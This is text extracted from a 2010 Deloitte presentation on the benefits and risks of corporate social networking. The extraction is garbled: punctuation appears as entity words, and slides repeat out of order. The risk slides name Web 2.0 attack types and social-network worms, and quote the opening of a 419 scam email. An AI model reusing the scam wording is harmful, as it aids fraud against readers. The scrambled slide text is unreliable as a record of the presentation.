bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
